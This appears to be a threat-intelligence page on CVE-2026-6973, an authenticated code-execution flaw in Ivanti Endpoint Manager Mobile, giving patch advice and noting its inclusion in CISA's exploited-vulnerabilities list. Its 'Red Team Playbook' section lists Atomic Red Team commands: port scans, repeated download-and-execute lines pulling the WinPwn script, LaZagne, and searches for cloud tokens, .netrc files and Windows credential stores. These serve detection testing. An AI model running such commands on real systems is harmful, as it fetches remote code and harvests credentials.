CVE-2026-6973
Overview
This vulnerability is an improper input validation flaw within Ivanti Endpoint Manager Mobile's administrative interface. The root cause lies in insufficient sanitization of inputs processed by privileged functions, enabling crafted input to bypass validation controls. The affected component is the administrative access functionality in versions prior to 12.6.1.1, 12.7.0.1, and 12.8.0.1.
Vulnerability Description
An Improper Input Validation in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remotely authenticated user with administrative access to achieve remote code execution.
Impact
An attacker with valid administrative credentials can execute arbitrary code remotely on the affected Ivanti Endpoint Manager Mobile server. This enables full system compromise, including unauthorized control over managed devices and sensitive data. The prerequisite is possession of an administrative-level account on the system. Such access facilitates lateral movement within the network and potential disruption of endpoint management operations, severely impacting organizational security posture.
Solution
Ivanti has released security updates addressing this vulnerability in Ivanti Endpoint Manager Mobile versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 as detailed in their May 2026 Security Advisory. Administrators should apply these specific patches promptly. For detailed patching instructions and additional mitigation guidance, refer to the official Ivanti advisory at https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs?language=en_US.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Ivanti Endpoint Manager Mobile (EPMM) arises from improper input validation, which can be exploited by a remotely authenticated user with administrative privileges. This flaw allows the attacker to execute arbitrary code on the affected system, potentially leading to severe consequences. The improper handling of input can allow malicious commands to be processed, bypassing the intended security controls. This vulnerability highlights the critical importance of robust input validation mechanisms in software development, as they serve as the first line of defense against various forms of attacks, including code injection.
Exploitation of this vulnerability can occur through several attack vectors. An attacker with administrative access could craft specially formatted requests or payloads that exploit the input validation flaw. This could involve sending malicious data through the administrative interface or API, which the system fails to properly sanitize. Once the code execution is achieved, the attacker could gain full control over the system, allowing them to manipulate sensitive data, deploy malware, or pivot to other systems within the network. The potential for lateral movement within an organization’s infrastructure makes this vulnerability particularly concerning, as it could lead to a broader compromise of the network.
The real-world impact of this vulnerability can be significant for organizations using Ivanti EPMM. Given that the product is often deployed in environments managing mobile devices and sensitive data, the consequences of a successful exploit could include data breaches, loss of intellectual property, and damage to the organization’s reputation. Furthermore, regulatory implications may arise if sensitive customer data is exposed, leading to potential fines and legal ramifications. The business risk is compounded by the fact that administrative access is typically granted to trusted personnel, making it essential for organizations to maintain strict access controls and monitoring to mitigate the risk of insider threats.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching the Ivanti EPMM to the latest versions is crucial, as this will address the known flaws. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their systems. Employing intrusion detection systems (IDS) can help monitor for unusual activities that may indicate exploitation attempts. Furthermore, implementing strict access controls and ensuring that administrative privileges are granted only to necessary personnel can reduce the risk of exploitation by limiting the attack surface.
In conclusion, the improper input validation vulnerability in Ivanti Endpoint Manager Mobile poses a significant threat to organizations that rely on this software for managing mobile devices. The potential for remote code execution by an authenticated user with administrative access underscores the need for stringent security practices, including regular updates, access controls, and continuous monitoring. By adopting a proactive approach to vulnerability management, organizations can better protect their assets and mitigate the risks associated with such vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2026-6973, coinciding with its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition elevates the vulnerability’s profile within the security community and signals increased scrutiny from both defenders and potential adversaries. Although no new exploit techniques or ransomware associations have emerged, the sharp rise in telemetry detections indicates growing interest or reconnaissance efforts targeting Ivanti Endpoint Manager Mobile environments. The updated CVSS score of 7.2 and a rising EPSS score reflect a heightened likelihood of exploitation attempts in the near term. Consequently, the threat level has shifted from theoretical to actively monitored, underscoring the need for vigilance in environments where administrative access to affected versions is possible.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Endpoint Manager Mobile | All |
cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager Mobile | 12.7.0.0 |
cpe:2.3:a:ivanti:endpoint_manager_mobile:12.7.0.0:*:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager Mobile | 12.8.0.0 |
cpe:2.3:a:ivanti:endpoint_manager_mobile:12.8.0.0:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
16 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Active exploitation confirmed — vendor: Ivanti, product: Endpoint Manager Mobile (EPMM)
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-6973 |
| hub.ivanti.com |
GitHub CVE
|
https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs?language=en_US |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-6973 |
| hub.ivanti.com |
GitHub CVE
|
https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-6973-CVE-2026-10727?language=en_US |
| hub.ivanti.com |
GitHub CVE
|
https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs |